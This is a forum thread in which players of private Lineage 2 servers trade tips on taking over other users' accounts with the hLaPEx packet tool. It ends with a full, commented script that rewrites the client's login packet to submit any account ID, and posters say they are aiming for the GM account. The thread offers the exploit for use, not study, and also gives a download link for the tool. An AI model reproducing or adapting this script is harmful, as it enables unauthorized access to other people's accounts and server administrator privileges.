Jump to content

Recommended Posts

Posted

WooooooooOoOoOoOOT!!! PWNED!!! :D

I am trying on one server but i cant get on, only empty accounts, i've tried: 1, 2, 4, 5 and 6 :S so?

Posted

so i do this :

1.open hlapex

2. load script (changed account name)

3. run l2.exe

4. login an exsting account

 

in hlapex  it doesnt connect t the server.. at IP: ??? and server : SUSPENDED

 

what have i done wrong?

 

P.S> I downloaded hlapex from here : http://msfu.net.ru/download/download.php?fn=lineage/hLaPEx.rar&l=e

Posted

lol

i used hlapex before.. but then the program  connected to the server before..

isnt it normal that if u have hlapex running.. whe u load l2.exe and login an account hlapex would connect to the server too?

Posted

any L2OFF server, you just need to know the ID. And i want the GM id ¬,¬

but this have no sense.. my id is 26055, and i've tried every 2605X and doesnt work.. but 26060, 26061 and 26062 works. . .

 

What the hell is going on?

Posted

I just post this script for the noobs, is the SAME script but with a little guide :) Just add all lines to your HlApeX script tab and read

const
//Here goes the account number
//Example: account=26062;
//To find your account ID select "Capture" on "Sniffer" tab.
//Login to your server and go to the character screen
//Then, go to the "Sniffer" tab again and you will see
//A text at the left "RequestAuthLogin"
//There you will see something like this:
//LoginName: YOUR ACCOUNT                       
//PlayKey2: F8020000 <--- This is the account id!!!      
//PlayKey1: 0C000000
//LoginKey1: F8020000 <--- This is the account id!!!      
//LoginKey2: EB655315        
//Now add your Account ID to the line below 
//(Or use ANY ID to see if it works, you can't know the ID of a player that is not you so just type numbers)
account=1;
//Do not touch anything below this                                                                               
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

Guest
This topic is now closed to further replies.



×
×
  • Create New...